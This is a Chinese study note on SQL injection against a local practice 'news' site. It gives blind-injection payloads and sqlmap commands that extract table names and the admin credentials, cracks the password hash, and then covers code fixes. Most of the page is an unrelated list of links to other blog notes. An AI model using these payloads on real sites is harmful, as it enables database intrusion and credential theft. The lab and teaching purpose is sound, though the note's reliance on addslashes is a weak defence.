Lyx-0607
Lyx-0607

sql注入

1.使用bp辅助盲注

1.1 猜解数据库名称长度:4

http://127.0.0.1/news/show.php
?id=46 and length(database())=n

1.2 猜解数据库名称字符串:news

http://127.0.0.1/news/show.php
?id=46 and ord(substr(database(),m,1))=n

ascii与字符串互相转换

https://www.toolnb.com/tools/asciiTools.html

页面每转换一次,需要刷新。

 

在使用bp的intruder攻击时,通过增加线程提高攻击的频率。在intruder模块的options选项中可以设置线程数。默认是5,可以设置为100。

1.3 猜解news库所有表名组成的字符串的长度:98

http://127.0.0.1/news/show.php
?id=46 and length((select group_concat(table_name) from information_schema.tables where table_schema='news'))=n

1.4 猜解news库所有表名组成的字符串:

http://127.0.0.1/news/show.php
?id=46 and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='news'),m,1))=n

news_article,news_category,news_file,news_friendlink,news_message,news_notice,news_page,news_users

 

1.5 猜解news库news_users表的字段组成的字符串的长度:24

http://127.0.0.1/news/show.php
?id=46 and length((select group_concat(column_name) from information_schema.columns where table_schema='news' and table_name='news_users'))=n

1.6 猜解news库news_users表的字段组成的字符串:

http://127.0.0.1/news/show.php
?id=46 and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='news' and table_name='news_users'),m,1))=n

userid,username,password

 

1.7 猜解news库的news_users表的username字段值的长度:5

http://127.0.0.1/news/show.php
?id=46 and length((select group_concat(username) from news_users))=n

1.8 猜解news库的news_users表的username字段值:admin

 

http://127.0.0.1/news/show.php
?id=46 and ord(substr((select group_concat(username) from news_users),m,1))=n

 

1.9 猜解news库的news_users表的password字段值的长度:32

http://127.0.0.1/news/show.php
?id=46 and length((select group_concat(password) from news_users))=n

1.10 猜解news库的news_users表的password字段值:e10adc3949ba59abbe56e057f20f883e

 

http://127.0.0.1/news/show.php
?id=46 and ord(substr((select group_concat(password) from news_users),m,1))=n

 

1.11 通过cmd5网站查询得到原始的口令:123456

 

 

2.Sqlmap的安装和使用

#  一  windows中使用sqlmap 
# 1. 获取服务器信息,包括操作系统、数据库、web容器、后端语言
#  python sqlmap.py  -u url
# 2. 获取数据库名称列表 
# python sqlmap.py -u url  -dbs
 # 3. 获取当前数据库名称  
# python sqlmap.py -u url  --current-db 
# 4. 获取当前数据库中所有表的名称
# python sqlmap.py -u url  -D 数据库名 --tables 
# 5. 获取当前数据库指定的表的字段名
# python sqlmap.py -u url  -D 数据库名 -T 表名 --columns  
# 6. 获取指定库指定表指定字段的值
# python sqlmap.py -u url  -D 数据库名 -T 表名 -C 字段名1,字段名2...  --dump 

 # 二 kali中使用sqlmap 
 sqlmap  -u http://192.168.10.1/news/show.php?id=46
sqlmap -u http://192.168.10.1/news/show.php?id=46 -dbs
sqlmap -u http://192.168.10.1/news/show.php?id=46 --current-db 
sqlmap -u http://192.168.10.1/news/show.php?id=46 -D news --tables
sqlmap -u http://192.168.10.1/news/show.php?id=46 -D news -T news_users --columns
sqlmap -u http://192.168.10.1/news/show.php?id=46 -D news -T news_users -C username,password --dump

 

 

3.Sql注入的防护:

3.1代码的防护

1.数值型的参数做类型转换

文件的181行:

D:\phpStudy\WWW\news\include\common.function.php 
function getArticleInfo($id=0){
  global $db;
  if($id==0){
    if(empty($_GET['id'])){
      return false;
    }else{
       // $id = $_GET['id'];
      // 对用户输入的数据做int类型的转换 
        $id =intval( $_GET['id']); 
    }
  }
  return $db->getOneRow("select * from news_article where id=".$id);
}

 

2.字符型的参数通过addslashes函数增加\

D:\phpStudy\WWW\news\newsAdmin\admin\login.action.php  第6行
if (isset ( $_POST ["username"] )) {
   //$username =$_POST ["username"];
  // 防止sql注入 
  //  \' or 1=1#
   //  \'不能再起到闭合,作为数据的一部分 
  
   $username =addslashes($_POST ["username"]); 
} else {
  $username = "";
}

 

3.预处理的方式执行sql语句(主要防止数值型的sql注入,自动会有类型检查)

3.2产品防护-WAF:Web应用防火墙

 

批量挖掘sql注入:

https://www.cnblogs.com/Azjj/p/14002310.html

 

猎才课程笔记:

https://www.wolai.com/3bTm9F5PLaHGYwJPxygP16

https://www.wolai.com/fgeDuHzN6uExqvU9Nz353J

 

你可能感兴趣的:(笔记)

  • 学习笔记分享-快速掌握前端-html进阶(利用telnet发送json请求、利用telnet发送multipart请求) 2301_81243975 前端学习笔记
    前言图片上面的personal表示只有图片上面的一行语句是解释图片内容的、local表示这个图片所在标题下的所有语句都是解释图片内容的、global表示有多个标题下的所有语句都是解释图片内容的我是一名大二的学生,学了差不多一年java技术栈了,想记录一下自己对知识点的心得,目前还是个小白,期望大佬们可以指出我笔记中的不足之处、对知识点的认知错误、笔记结构的混乱等这些图片内容都是在观看黑马课程时的视
  • 学习笔记分享-数据结构与算法-图-Dijkstra(算法描述、算法实现) 2301_81243975 算法学习笔记
    前言图片上面的personal表示只有图片上面的一行语句是解释图片内容的、local表示这个图片所在标题下的所有语句都是解释图片内容的、global表示有多个标题下的所有语句都是解释图片内容的我是一名大二的学生,学了差不多一年java技术栈了,想记录一下自己对知识点的心得,目前还是个小白,期望大佬们可以指出我笔记中的不足之处、对知识点的认知错误、笔记结构的混乱等这些图片内容都是在观看黑马课程时的视
  • Android开发笔记: 5种对话框案例 程序猿的杂货店 Android开发笔记android开发笔记PopupWindowAlertDialogProgressDialog
    5种android对话框1弹出普通对话框---系统更新2自定义对话框--用户登录3时间选择对话框--时间对话框4进度条对话框--信息加载..5popuWindow对话框下载地址:http://download.csdn.net/download/taoerit/99651421弹出普通对话框---系统更新//弹出普通对话框publicvoidshowNormalDialog(Viewv){Aler
  • BGP反射器配置-笔记 yiluyangguang1234 网络
    路由反射器通告原则:当RR收到IBGP发来的路由,首先使用BGP选择路由的策略选择最佳路由。1.RR只把最佳路由通告反射出去,不会改变路由属性(包括下一跳、LP、MED)2.从非客户机IBGP对等体学到的路由,发布给此RR的所有客户机3.RR从客户端学习到的路由,反射给它的所有客户端和非
  • LeetCode 第 211 场周赛 (哈希表、字符串(取模、枚举)、排序+最长上升子序列和、筛法求约数+并查集) 2401_84046816 程序员leetcode散列表面试
    《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》,点击传送门,即可获取!for(inti=0;i
  • 学习笔记之debian的thonny开发(尚未验证)--从stm32裸机到linux嵌入式系统 sjh2100 嵌入式硬件硬件工程linuxstm32debian
    这应该算stm32裸机用户转linux嵌入式系统的入门学习笔记。【鲁班猫】39-vnc远程桌面连接鲁班猫_哔哩哔哩_bilibili本集的鲁班猫的视频介绍中,没有清晰明确指出需要linux开发板接入网络,接入网络可以使用有线网口或者wifi路由,有些提示信息是来自开发板还是win电脑屏幕并不是很明确。stm32开发需要win+keil+stlink+开发板。linux嵌入式系统应用开发需要:lin
  • 【LLM】大模型基础--大规模预训练语言模型的开源教程笔记 Langchain 笔记人工智能langchainllama大模型产品经理大模型基础
    1.引言本文以DataWhale大模型开源教程为学习路线,进行一整个大模型的入门操作什么是语言模型语言模型是一种对词元序列(token)的概率分布,可以用于评估文本序列的合理性并生成新的文本。从生成文本的方式来看,LM(languagemodle)可以简单的分为:自回归模型非自回归模型特点逐字生成文本,每个词的生成都依赖于上文,关联性好一次性生成整个文本序列,不捕捉上文信息优点内容质量高生成速度快
  • Matlab 机器人 雅可比矩阵 CodingAlgo 算法
    ===工业机器人运动学与Matlab正逆解算法学习笔记(用心总结一文全会)(四)——雅可比矩阵_staubli机器人正逆向运动学实例验证matlab-CSDN博客===matlab求雅可比矩阵_六轴机械臂矢量积法求解雅可比矩阵-CSDN博客===(63封私信/80条消息)MATLAB机器人工具箱中机器人逆解是如何求出来的?-知乎===https://zhuanlan.zhihu.com/p/638
  • C#学习笔记——StringBuilder类 oyqho C#官方文档学习笔记c#游戏unity
    在C#中,有一个非常实用的创建字符型数据的类——StringBuilder类,使用StringBuilder,可以创建出字符串,并且StringBuilder中封装的有许多对字符串进行操作的方法(这一点很方便)。比如说字符串是固定长度的,但是通过StringBuilder类中的Append()方法就可以改变字符串的长度。StringBuilder类的使用需要在前面加上System.Text。代码如
  • PySide6 GUI 学习笔记——常用类及控件使用方法(常用类尺寸QSize) Humbunklung PySide6学习笔记学习笔记pythonpyqt
    尺寸类之——QSizeQSize类通过整数形式定义一个二维对象的尺寸,包括宽width()和高height()。QSize官方文档方法概述def__init__()def__reduce__()def__repr__()defboundedTo()defexpandedTo()defgrownBy()defheight()defisEmpty()defisNull()defisValid()def
  • 电路笔记(三极管器件): MOSFET&IGBT FakeOccupational 硬件和移动端笔记单片机嵌入式硬件
    MOSFETvsIGBTMOSFET主要用于低电压和功率系统,而IGBT更适合高电压和功率系统。1.MOSFET(金属氧化物半导体场效应晶体管)优势:高开关速度和响应速度,适合高频应用。(IGBT不适合高频应用,它能在千Hz频率下运行良好。MOSFET适合非常高频的应用,它可以在兆Hz频率下运行良好。)较低的导通压降和导通损耗,功率密度高。适用于低至中功率应用,例如电源开关、调制器、放大器等。实际
  • 《高效学习法:如何通过“案例学习法”提升应用能力?》
    引言:聊聊我的学习困境[]()曾经的我,深陷学习的泥沼,怎么也挣扎不出来。每次坐在书桌前,看着堆积如山的书本和资料,满心都是焦虑和无助。那些密密麻麻的文字,仿佛是一道道难以跨越的沟壑,让我望而却步。课堂上,我拼命想要集中注意力,可思绪总是不由自主地飘走。老师讲的内容,我只能一知半解,笔记也记得乱七八糟。课后复习时,面对那些似曾相识又完全陌生的知识点,我感觉自己就像一只无头苍蝇,四处乱撞,却找不到方
  • C++11 学习笔记 毛驴要倒着骑 c++学习笔记
    EffectiveModernC++第一章新特性类型推导auto关键字:隐式定义,也是强类型定义。在编译期让编译器自动推断出变量类型以便分配内存,必须在定义时进行初始化decltype关键字:获取表达式的类型typedef重定义一个模板需要借助外敷类,但是using别名语法覆盖了typedef全部功能。使用using重定义模板会更简洁,定义函数指针会更加清晰。templatestructstr_m
  • 【C++学习笔记】if 和 if constexpr Go 鹏ya C++工作日常技能c++学习笔记
    背景在工作中,在一个模版函数里,需要判断if(std::is_same)来选择走哪个分支,分支里的函数是只能处理相应的类型的,编译过程中产生了报错。解释if(std::is_same::value)和ifconstexpr(std::is_same::value)在功能上都是检查模板类型参数T是否与float类型相同。但两者的主要区别在于它们执行这个检查的时间和方式。如果你使用if(std::is
  • JavaScript 简介 强强学习 javascript开发语言ecmascript
    JavaScript是互联网上最流行的脚本语言,这门语言可用于HTML和web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。JavaScript是脚本语言JavaScript是一种轻量级的编程语言。JavaScript是可插入HTML页面的编程代码。JavaScript插入HTML页面后,可由所有的现代浏览器执行。JavaScript很容易学习。
  • 学C++,赢好礼!写下你的学习笔记,成为技术分享达人! CSDN资讯 c++学习笔记
    自「侯捷C++系列课程」上线以来,已吸引了无数开发者的关注与参与,为激发学员的学习热情,增加知识点的理解与应用,同时增加课程的曝光度,特策划了侯捷C++系列课程学习笔记征文活动,并单独开设12节免费课时供大家观看学习。活动主页:https://activity.csdn.net/writing?id=10820侯捷C++系列课程观看地址:https://edu.csdn.net/cloud/hou
  • 《On Java进阶卷》阅读笔记(二) m0_74823317 面试学习路线阿里巴巴java笔记python
    第3章集合主题List的行为:List是除数组之外最基本的对象存储和检索方式,基本操作如下:add()用于插入元素get()用于随机访问元素,这个操作在特定的List的实现成本不同iterator()用于返回该序列上的iteratorstream()用于生成序列中元素的StreamSet的行为:Set的意义在于测试成员身份,也可以用于删除重复元素。HashSet的输出是没有明显的顺序TreeSet
  • RPC框架Dubbo深入分析 radcb55226 程序员rpcdubbo网络协议
    《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》,点击传送门,即可获取!依赖于Zookeeper的稳定性Redis支持基于客户端双写的集群方式,性能高要求服务器时间同步,用于检查心跳过期脏数据Multicast去中心化,不需要安装注册中心依赖于网络拓普和路由,跨机房有风险SimpleDogfooding,注册中心本身也是一个标准的RPC服务没有集群支持,可能单点故障cl
  • 从Paxos到Zookeeper笔记1——第一章:分布式架构 半臻(火白) 分布式大数据zookeeper
    第1章:分布式架构将多台机器组成分布式的处理方式越来越收到业界的青睐。1.1从集中式到分布式由于大型主机拥有卓越的性能和良好的稳定性,在单机处理方面优势非常明显。但是随着计算机系统向网络化和微型化的方向发展,传统的集中式处理越来越不适应人们的需求。大型主机的缺点:(1)操作难度大。(2)价格昂贵(3)虽然大型主机稳定,但是一旦出现故障后果严重(4)扩容非常困难阿里提出的“去IOE”运动,让计算和存
  • 常见数据结构的简介(基本概念 & 操作 & 时间复杂度) 子诚之 编程
    文章目录0.概览1.线性表、栈和队列2.数组2.1基本操作1)时间复杂度2)案例3.字符串3.1存储结构3.2基本操作1)时间复杂度2)案例:最大公共字符串4.二叉树4.1储存结构4.2基本操作1)时间复杂度2)案例:使用字典树判断字符串是否存在5.哈希/散列表5.1哈希函数5.2基本操作1)时间复杂度2)案例:构建哈希表《重学数据结构与算法》学习笔记0.概览数据结构增删查特点线性表变长栈队列数组
  • app,waf笔记 qq_45981247 笔记
    API攻防知识点:1、HTTP接口类-测评2、RPC类接口-测评3、WebService类-测评内容点:SOAP(SimpleObjectAccessProtocol)简单对象访问协议是交换数据的一种协议规范,是一种轻量级的、简单的、基于XML(标准通用标记语言下的一个子集)的协议,它被设计成在WEB上交换结构化的和固化的信息。SOAP部署WebService的专有协议。SOAP使用HTTP来发送
  • Android技术笔记 桃花镇童长老ᥫ᭡ Androidandroid笔记
    1、TextView设置宽度(行内可包含的字符数)android:ems="12"//宽度为12个字符的宽度。android:maxEms="18"//最大宽度为18个字符的宽度。android:minEms="10"//最小宽度为10个字符的宽度。android:letterSpacing="0.1"//控制文字水平间距注意事项:1、只有在android:layout_width=“wrap_c
  • 笔记-《A Survey of Large Language Models》- 尾声 L_serein 玩转LLM笔记语言模型人工智能
    尾声:尾声:本综述是由我们研究团队在一次讨论会上计划的,我们旨在总结LLM的最新进展,为我们的团队成员提供一份高度可读性的报告。第一稿于2023年3月13日完成,我们的团队成员尽最大努力以相对客观、全面的方式囊括有关LLM的相关研究。接着,我们进行了多次细致的写作和内容修订。尽管我们付出了巨大的努力,但这份综述仍远非完美:我们可能会遗漏重要的参考文献或主题,也可能存在不严谨的表述或讨论。由于空间有
  • 本地部署model scope魔搭大模型流程 CQller python算法深度学习机器学习jupyterpytorch
    一、安装python二、安装Gradio三、添加镜像加速四、运行字符串倒叙五、运行绘图六、安装常用软件包和库七、我目前使用的软件包和库简介八、文字生成图片AI模型九、文字回复AI模型一、安装python可参考安装步骤:python学习笔记-python安装与环境变量配置_python环境变量-CSDN博客二、安装Gradio在cmd执行以下命令。Gradio封装了功能丰富的前端用户界面,一会儿用来
  • html5游戏引擎-Pharse.js学习笔记(一) 18520195858 游戏javascriptc/c++ViewUI
    1.前言前几天随着flappybird这样的小游戏的火爆,使我这种也曾了解过html5技术的js业余爱好者也开始关注游戏开发。研究过两个个比较成熟的html5游戏引擎,感觉用引擎还是要方便一些。所以决定从今天正式开始研究html5游戏引擎,并且将从看官网demo的学习整理成博客和大家一起分享。我了解过cocos-2dforhtml5和phaser.js这两个引擎,其中前者比较复杂,对于有过coco
  • 【转】时间序列分析——基于R,王燕 weixin_30780221 r语言
    《时间序列分析——基于R》王燕,读书笔记笔记:一、检验:1、平稳性检验:图检验方法:时序图检验:该序列有明显的趋势性或周期性,则不是平稳序列自相关图检验:(acf函数)平稳序列具有短期相关性,即随着延迟期数k的增加,平稳序列的自相关系数ρ会很快地衰减向0(指数级衰减),反之非平稳序列衰减速度会比较慢构造检验统计量进行假设检验:单位根检验adfTest()——fUnitRoots包2、纯随机性检验、
  • 【Vim Masterclass 笔记10】S06L23:Vim 核心操作训练之 —— 文本的搜索、查找与替换操作(第二部分) 安冬的码畜日常 VimMasterclassvim笔记vim查找与替换
    文章目录S06L23Search,Find,andReplace-PartTwo1文本替换命令`:s/old/new/`2指定范围的文本替换3特例:路径的替换4文件行号的配置5要点总结(1)搜索当前行(SameLineSearching)(2)跨行搜索(Searching)(3)替换命令(SubstituteCommand)写在前面根据李笑来《自学是门手艺》的建议,梳理完知识要点后又对这章内容制作
  • 【Vim Masterclass 笔记13】第 7 章:Vim 核心操作之——文本对象与宏操作 + S07L28:Vim 文本对象 安冬的码畜日常 VimMasterclassvim笔记vim文本对象文本对象
    文章目录Section7:TextObjectsandMacrosS07L28TextObjects1文本对象的含义2操作文本对象的基本语法3操作光标所在的整个单词4删除光标所在的整个句子5操作光标所在的整个段落6删除光标所在的中括号内的文本7删除光标所在的小括号内的文本8操作尖括号内的文本9操作光标所在的标签文本10操作大括号内的文本11操作光标所在的各种括号内的文本12本节思维导图写在前面本篇
  • 企业使用统一终端管理(UEM)工具提高端点安全性 ManageEngine卓豪 统一终端管理终端管理端点安全统一终端管理UEM
    什么是统一终端管理(UEM)统一终端管理(UEM)是一种从单个控制台管理和保护企业中所有端点的方法,包括智能手机、平板电脑、笔记本电脑、台式机和IoT设备。UEM解决方案为IT管理员提供了一个集中式平台,用于跨所有作系统和设备类型部署、配置、管理和保护端点。统一终端管理(UEM)对企业有哪些好处使用UEM的企业可以简化跨各种作系统和设备类型的端点管理,而无需依赖多种工具,从而提高效率。随着整个IT
  • 【合集】Java进阶——Java深入学习的笔记汇总 & 再论面向对象、数据结构和算法、JVM底层、多线程、类加载、 web_15534274656 面试学习路线阿里巴巴java学习笔记
    前言spring作为主流的JavaWeb开发的开源框架,是Java世界最为成功的框架,持续不断深入认识spring框架是Java程序员不变的追求;而spring的底层其实就是Java,因此,深入学习Spring和深入学习Java是硬币的正反面,两者相辅相成,相互促进。本篇博客是一篇不定期持续更新的博客,是一些Java深入学习的笔记汇总。目录前言面向对象专题再论面向对象封装和关键字private,t
  • Nginx负载均衡 510888780 nginx应用服务器
    Nginx负载均衡一些基础知识: nginx 的 upstream目前支持 4 种方式的分配 1)、轮询(默认)       每个请求按时间顺序逐一分配到不同的后端服务器,如果后端服务器down掉,能自动剔除。 2)、weight       指定轮询几率,weight和访问比率成正比
  • RedHat 6.4 安装 rabbitmq bylijinnan erlangrabbitmqredhat
    在 linux 下安装软件就是折腾,首先是测试机不能上外网要找运维开通,开通后发现测试机的 yum 不能使用于是又要配置 yum 源,最后安装 rabbitmq 时也尝试了两种方法最后才安装成功 机器版本: [root@redhat1 rabbitmq]# lsb_release LSB Version: :base-4.0-amd64:base-4.0-noarch:core
  • FilenameUtils工具类 eksliang FilenameUtilscommon-io
    转载请出自出处:http://eksliang.iteye.com/blog/2217081 一、概述 这是一个Java操作文件的常用库,是Apache对java的IO包的封装,这里面有两个非常核心的类FilenameUtils跟FileUtils,其中FilenameUtils是对文件名操作的封装;FileUtils是文件封装,开发中对文件的操作,几乎都可以在这个框架里面找到。 非常的好用。
  • xml文件解析SAX 不懂事的小屁孩 xml
    xml文件解析:xml文件解析有四种方式, 1.DOM生成和解析XML文档(SAX是基于事件流的解析) 2.SAX生成和解析XML文档(基于XML文档树结构的解析) 3.DOM4J生成和解析XML文档 4.JDOM生成和解析XML 本文章用第一种方法进行解析,使用android常用的DefaultHandler import org.xml.sax.Attributes;
  • 通过定时任务执行mysql的定期删除和新建分区,此处是按日分区 酷的飞上天空 mysql
    使用python脚本作为命令脚本,linux的定时任务来每天定时执行 #!/usr/bin/python # -*- coding: utf8 -*- import pymysql import datetime import calendar #要分区的表 table_name = 'my_table' #连接数据库的信息 host,user,passwd,db =
  • 如何搭建数据湖架构?听听专家的意见 蓝儿唯美 架构
    Edo Interactive在几年前遇到一个大问题:公司使用交易数据来帮助零售商和餐馆进行个性化促销,但其数据仓库没有足够时间去处理所有的信用卡和借记卡交易数据  “我们要花费27小时来处理每日的数据量,”Edo主管基础设施和信息系统的高级副总裁Tim Garnto说道:“所以在2013年,我们放弃了现有的基于PostgreSQL的关系型数据库系统,使用了Hadoop集群作为公司的数
  • spring学习——控制反转与依赖注入 a-john spring
           控制反转(Inversion of Control,英文缩写为IoC)是一个重要的面向对象编程的法则来削减计算机程序的耦合问题,也是轻量级的Spring框架的核心。 控制反转一般分为两种类型,依赖注入(Dependency Injection,简称DI)和依赖查找(Dependency Lookup)。依赖注入应用比较广泛。  
  • 用spool+unixshell生成文本文件的方法 aijuans xshell
    例如我们把scott.dept表生成文本文件的语句写成dept.sql,内容如下:   set pages 50000;   set lines 200;   set trims on;   set heading off;   spool /oracle_backup/log/test/dept.lst;   select deptno||','||dname||','||loc
  • 1、基础--名词解析(OOA/OOD/OOP) asia007 学习基础知识
    OOA:Object-Oriented Analysis(面向对象分析方法) 是在一个系统的开发过程中进行了系统业务调查以后,按照面向对象的思想来分析问题。OOA与结构化分析有较大的区别。OOA所强调的是在系统调查资料的基础上,针对OO方法所需要的素材进行的归类分析和整理,而不是对管理业务现状和方法的分析。   OOA(面向对象的分析)模型由5个层次(主题层、对象类层、结构层、属性层和服务层)
  • 浅谈java转成json编码格式技术 百合不是茶 json编码java转成json编码
    json编码;是一个轻量级的数据存储和传输的语言       在java中需要引入json相关的包,引包方式在工程的lib下就可以了   JSON与JAVA数据的转换(JSON 即 JavaScript Object Natation,它是一种轻量级的数据交换格式,非   常适合于服务器与 JavaScript 之间的数据的交
  • web.xml之Spring配置(基于Spring+Struts+Ibatis) bijian1013 javaweb.xmlSSIspring配置
    指定Spring配置文件位置 <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/spring-dao-bean.xml,/WEB-INF/spring-resources.xml, /WEB-INF/
  • Installing SonarQube(Fail to download libraries from server) sunjing InstallSonar
    1.  Download and unzip the SonarQube distribution 2.  Starting the Web Server The default port is "9000" and the context path is "/". These values can be changed in &l
  • 【MongoDB学习笔记十一】Mongo副本集基本的增删查 bit1129 mongodb
    一、创建复本集   假设mongod,mongo已经配置在系统路径变量上,启动三个命令行窗口,分别执行如下命令:   mongod --port 27017 --dbpath data1 --replSet rs0 mongod --port 27018 --dbpath data2 --replSet rs0 mongod --port 27019 -
  • Anychart图表系列二之执行Flash和HTML5渲染 白糖_ Flash
    今天介绍Anychart的Flash和HTML5渲染功能   HTML5 Anychart从6.0第一个版本起,已经逐渐开始支持各种图的HTML5渲染效果了,也就是说即使你没有安装Flash插件,只要浏览器支持HTML5,也能看到Anychart的图形(不过这些是需要做一些配置的)。 这里要提醒下大家,Anychart6.0版本对HTML5的支持还不算很成熟,目前还处于
  • Laravel版本更新异常4.2.8-> 4.2.9 Declaration of ... CompilerEngine ... should be compa bozch laravel
    昨天在为了把laravel升级到最新的版本,突然之间就出现了如下错误: ErrorException thrown with message "Declaration of Illuminate\View\Engines\CompilerEngine::handleViewException() should be compatible with Illuminate\View\Eng
  • 编程之美-NIM游戏分析-石头总数为奇数时如何保证先动手者必胜 bylijinnan 编程之美
    import java.util.Arrays; import java.util.Random; public class Nim { /**编程之美 NIM游戏分析 问题: 有N块石头和两个玩家A和B,玩家A先将石头随机分成若干堆,然后按照BABA...的顺序不断轮流取石头, 能将剩下的石头一次取光的玩家获胜,每次取石头时,每个玩家只能从若干堆石头中任选一堆,
  • lunce创建索引及简单查询 chengxuyuancsdn 查询创建索引lunce
    import java.io.File; import java.io.IOException; import org.apache.lucene.analysis.Analyzer; import org.apache.lucene.analysis.standard.StandardAnalyzer; import org.apache.lucene.document.Docume
  • [IT与投资]坚持独立自主的研究核心技术 comsci it
           和别人合作开发某项产品....如果互相之间的技术水平不同,那么这种合作很难进行,一般都会成为强者控制弱者的方法和手段.....        所以弱者,在遇到技术难题的时候,最好不要一开始就去寻求强者的帮助,因为在我们这颗星球上,生物都有一种控制其
  • flashback transaction闪回事务查询 daizj oraclesql闪回事务
       闪回事务查询有别于闪回查询的特点有以下3个: (1)其正常工作不但需要利用撤销数据,还需要事先启用最小补充日志。 (2)返回的结果不是以前的“旧”数据,而是能够将当前数据修改为以前的样子的撤销SQL(Undo SQL)语句。 (3)集中地在名为flashback_transaction_query表上查询,而不是在各个表上通过“as of”或“vers
  • Java I/O之FilenameFilter类列举出指定路径下某个扩展名的文件 游其是你 FilenameFilter
    这是一个FilenameFilter类用法的例子,实现的列举出“c:\\folder“路径下所有以“.jpg”扩展名的文件。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
  • C语言学习五函数,函数的前置声明以及如何在软件开发中合理的设计函数来解决实际问题 dcj3sjt126com c
    # include <stdio.h> int f(void) //括号中的void表示该函数不能接受数据,int表示返回的类型为int类型 { return 10; //向主调函数返回10 } void g(void) //函数名前面的void表示该函数没有返回值 { //return 10; //error 与第8行行首的void相矛盾 } in
  • 今天在测试环境使用yum安装,遇到一个问题: Error: Cannot retrieve metalink for repository: epel. Pl dcj3sjt126com centos
    今天在测试环境使用yum安装,遇到一个问题: Error: Cannot retrieve metalink for repository: epel. Please verify its path and try again   处理很简单,修改文件“/etc/yum.repos.d/epel.repo”, 将baseurl的注释取消, mirrorlist注释掉。即可。 &n
  • 单例模式 shuizhaosi888 单例模式
    单例模式      懒汉式 public class RunMain { /** * 私有构造 */ private RunMain() { } /** * 内部类,用于占位,只有 */ private static class SingletonRunMain { priv
  • Spring Security(09)——Filter 234390216 Spring Security
    Filter 目录 1.1     Filter顺序 1.2     添加Filter到FilterChain 1.3     DelegatingFilterProxy 1.4     FilterChainProxy 1.5
  • 公司项目NODEJS实践0.1 逐行分析JS源代码 mongodbnginxubuntunodejs
      一、前言         前端如何独立用nodeJs实现一个简单的注册、登录功能,是不是只用nodejs+sql就可以了?其实是可以实现,但离实际应用还有距离,那要怎么做才是实际可用的。         网上有很多nod
  • java.lang.Math liuhaibo_ljf javaMathlang
    System.out.println(Math.PI); System.out.println(Math.abs(1.2)); System.out.println(Math.abs(1.2)); System.out.println(Math.abs(1)); System.out.println(Math.abs(111111111)); System.out.println(Mat
  • linux下时间同步 nonobaba ntp
    今天在linux下做hbase集群的时候,发现hmaster启动成功了,但是用hbase命令进入shell的时候报了一个错误  PleaseHoldException: Master is initializing,查看了日志,大致意思是说master和slave时间不同步,没办法,只好找一种手动同步一下,后来发现一共部署了10来台机器,手动同步偏差又比较大,所以还是从网上找现成的解决方
  • ZooKeeper3.4.6的集群部署 roadrunners zookeeper集群部署
    ZooKeeper是Apache的一个开源项目,在分布式服务中应用比较广泛。它主要用来解决分布式应用中经常遇到的一些数据管理问题,如:统一命名服务、状态同步、集群管理、配置文件管理、同步锁、队列等。这里主要讲集群中ZooKeeper的部署。   1、准备工作 我们准备3台机器做ZooKeeper集群,分别在3台机器上创建ZooKeeper需要的目录。   数据存储目录
  • Java高效读取大文件 tomcat_oracle java
      读取文件行的标准方式是在内存中读取,Guava 和Apache Commons IO都提供了如下所示快速读取文件行的方法:   Files.readLines(new File(path), Charsets.UTF_8);   FileUtils.readLines(new File(path));   这种方法带来的问题是文件的所有行都被存放在内存中,当文件足够大时很快就会导致
  • 微信支付api返回的xml转换为Map的方法 xu3508620 xmlmap微信api
    举例如下: <xml>    <return_code><![CDATA[SUCCESS]]></return_code>    <return_msg><![CDATA[OK]]></return_msg>    <appid><
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他